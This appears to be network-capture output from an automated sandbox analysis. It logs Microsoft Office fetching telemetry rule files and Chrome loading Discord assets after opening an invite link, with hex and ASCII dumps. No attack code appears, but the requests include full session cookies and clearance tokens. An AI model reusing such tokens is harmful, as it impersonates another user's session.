                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    117192.168.2.54983813.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 3585b350-301e-005d-097c-3be448000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201250Z-178bfbc474brk967hC1NYCfu6000000004n000000000nyqk
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    118192.168.2.54983613.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                    x-ms-request-id: abcc4943-b01e-00ab-2315-3ddafd000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201250Z-178bfbc474b9fdhphC1NYCac0n00000004t000000000kk80
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    119192.168.2.54983513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:50 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 907655e5-001e-0065-594b-3c0b73000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201250Z-15b8b599d88f9wfchC1TEBm2kc00000003m0000000005m93
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    120192.168.2.549841162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC1385OUTGET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC955INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 2058
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d102cc41727a-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "e1349377226366f95f85ab9eac4586d3"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 05 Jun 2024 19:27:58 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9n9CPDXcBRin5pHq27JoA9VyUIPDh2UariR%2BhQ1OPF3npAwEaMejOZWxZlH9UaFoip5xhGdoxBrCHodscWVcr5WmiQQfFPQJluf0WFdIY3v545nkJ43nm4zJldhM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC414INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 35 20 34 35 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 20 63 6c 69 70 50 61 74 68 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 33 36 68 33 36 56 30 48 30 76 33 36 5a 22 2f 3e 0a 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 3c 6d 61 73 6b 20 69 64 3d 22 62 22 3e 0a 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 20 78 3d 22 30 22 20 79 3d 22 30 22 20 77 69 64 74 68 3d
                                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve"> <defs> <clipPath id="a" clipPathUnits="userSpaceOnUse"> <path d="M0 36h36V0H0v36Z"/> </clipPath> <mask id="b"> <g> <rect x="0" y="0" width=
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 32 35 20 30 20 30 20 2d 31 2e 32 35 20 30 20 34 35 29 22 20 6d 61 73 6b 3d 22 75 72 6c 28 23 62 29 22 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 37 35 20 31 38 2e 32 35 63 31 2e 32 32 36 2d 32 2e 31 39 35 20 31 2e 38 35 35 20 31 2e 33 36 31 20 39 2e 33 31 33 20 32 2e 36 32 35 20 37 2e 34 35 37 20 31 2e 32 36 34 20 31 33 2e 37 32 38 2d 34 2e 34 35 34 20 31 33 2e 38 35 39 2d 35 2e 34 31 33 43 33 36 2e 30 35 33 20 31 34 2e 35 30 34 20 33 31 2e 34 37 34 20 36 20 32 36 2e
                                                                                                                                                                                                                                                                                    Data Ascii: > </defs> <g> <g> <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)"> <g> <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC275INData Raw: 2e 31 34 20 32 2e 37 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 35 30 32 20 31 39 2e 33 37 35 63 2e 30 34 34 2d 2e 36 32 35 2e 35 30 36 2d 31 2e 35 31 31 2e 35 30 36 2d 31 2e 35 31 31 2d 31 2e 30 31 36 2d 31 2e 34 37 33 2d 35 2e 36 34 33 2d 33 2e 30 31 36 2d 37 2e 33 35 34 2d 32 2e 39 32 39 2e 30 39 36 2e 36 32 37 2e 32 38 33 20 31 2e 33 36 32 2e 36 32 37 20 32 2e 30 39 36 20 31 2e 38 34 34 2e 34 37 31 20 34 2e 36 36 20 31 2e 30 37 31 20 36 2e 32 32 31 20 32 2e 33 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: .14 2.744" fill="white"/> </g> <g> <path d="M12.502 19.375c.044-.625.506-1.511.506-1.511-1.016-1.473-5.643-3.016-7.354-2.929.096.627.283 1.362.627 2.096 1.844.471 4.66 1.071 6.221 2.344" fill="white"/> </g> </g>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    121192.168.2.549843162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:50 UTC673OUTGET /assets/d4dcfe8e106a8072717f.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 17667
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d102bc9f43be-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "27ded6c70d643b2405057d268b1544be"
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 13:28:33 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCc6B65s1J4qD1T5PBfhR5kimSqnPj7fObHT78O71VgQW3fB9Ot6vtpn%2BDrNMaLjsA1i4PpdZyMyH7CJq3O4Vdw3Ga3jkKt47ic94sdfW4GrOCe0LQufAoiEYt%2Fw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC409INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 35 37 38 38 22 5d 2c 7b 35 33 33 33 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 72 3b 76 61 72 20 69 3d 6e 28 35 34 34 38 39 31 29 2c 73 3d 6e 28 35 37 30 31 34 30 29 2c 6c 3d 6e 28 37 32 38 33 34 35 29 2c 6f 3d 6e 28 38 31 32 32 30 36 29 2c 61 3d 6e 28 36 32 35 31 32 38 29 2c 63 3d 6e 28 33 33 35 31 33 31 29 2c 64 3d 6e 28 36 36 39 30 37 39 29 2c 75 3d 6e 28 39 38 31 36 33 31 29 2c 5f 3d 6e 28 34 37 34 39 33 36 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25788"],{533307:function(e,t,n){let r;var i=n(544891),s=n(570140),l=n(728345),o=n(812206),a=n(625128),c=n(335131),d=n(669079),u=n(981631),_=n(474936);async function E(e){
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 4c 56 45 22 2c 63 6f 64 65 3a 65 7d 29 3b 74 72 79 7b 6c 65 74 20 72 3d 61 77 61 69 74 20 28 30 2c 64 2e 62 54 29 28 65 2c 74 2c 6e 29 3b 69 66 28 6e 75 6c 6c 21 3d 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 26 26 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 21 3d 3d 5f 2e 43 4c 29 7b 6c 65 74 20 65 3d 6f 2e 5a 2e 67 65 74 41 70 70 6c 69 63 61 74 69 6f 6e 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 29 3b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 72 79 7b 61 77 61 69 74 20 6c 2e 5a 50 2e 66 65 74 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 69 66 28 72 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3d 3d 3d 75 2e 58 41 4a 29 74 72 79 7b 61 77 61 69 74 20 28 30 2c 63
                                                                                                                                                                                                                                                                                    Data Ascii: LVE",code:e});try{let r=await (0,d.bT)(e,t,n);if(null!=r.application_id&&r.application_id!==_.CL){let e=o.Z.getApplication(r.application_id);if(null==e)try{await l.ZP.fetchApplication(r.application_id)}catch(e){}}if(r.application_id===u.XAJ)try{await (0,c
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1369INData Raw: 4f 44 45 5f 43 52 45 41 54 45 5f 53 55 43 43 45 53 53 22 2c 67 69 66 74 43 6f 64 65 3a 72 2e 62 6f 64 79 7d 29 2c 72 2e 62 6f 64 79 7d 63 61 74 63 68 28 6e 29 7b 73 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 43 52 45 41 54 45 5f 46 41 49 4c 55 52 45 22 2c 73 6b 75 49 64 3a 65 2c 73 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 49 64 3a 74 7d 29 7d 7d 2c 61 73 79 6e 63 20 72 65 76 6f 6b 65 47 69 66 74 43 6f 64 65 28 65 29 7b 73 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 52 45 56 4f 4b 45 22 2c 63 6f 64 65 3a 65 7d 29 3b 74 72 79 7b 61 77 61 69 74 20 69 2e 74 6e 2e 64 65 6c 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 55 53 45 52 5f 47 49 46 54 5f 43 4f 44 45 5f 52 45 56 4f 4b 45
                                                                                                                                                                                                                                                                                    Data Ascii: ODE_CREATE_SUCCESS",giftCode:r.body}),r.body}catch(n){s.Z.dispatch({type:"GIFT_CODE_CREATE_FAILURE",skuId:e,subscriptionPlanId:t})}},async revokeGiftCode(e){s.Z.dispatch({type:"GIFT_CODE_REVOKE",code:e});try{await i.tn.del({url:u.ANM.USER_GIFT_CODE_REVOKE
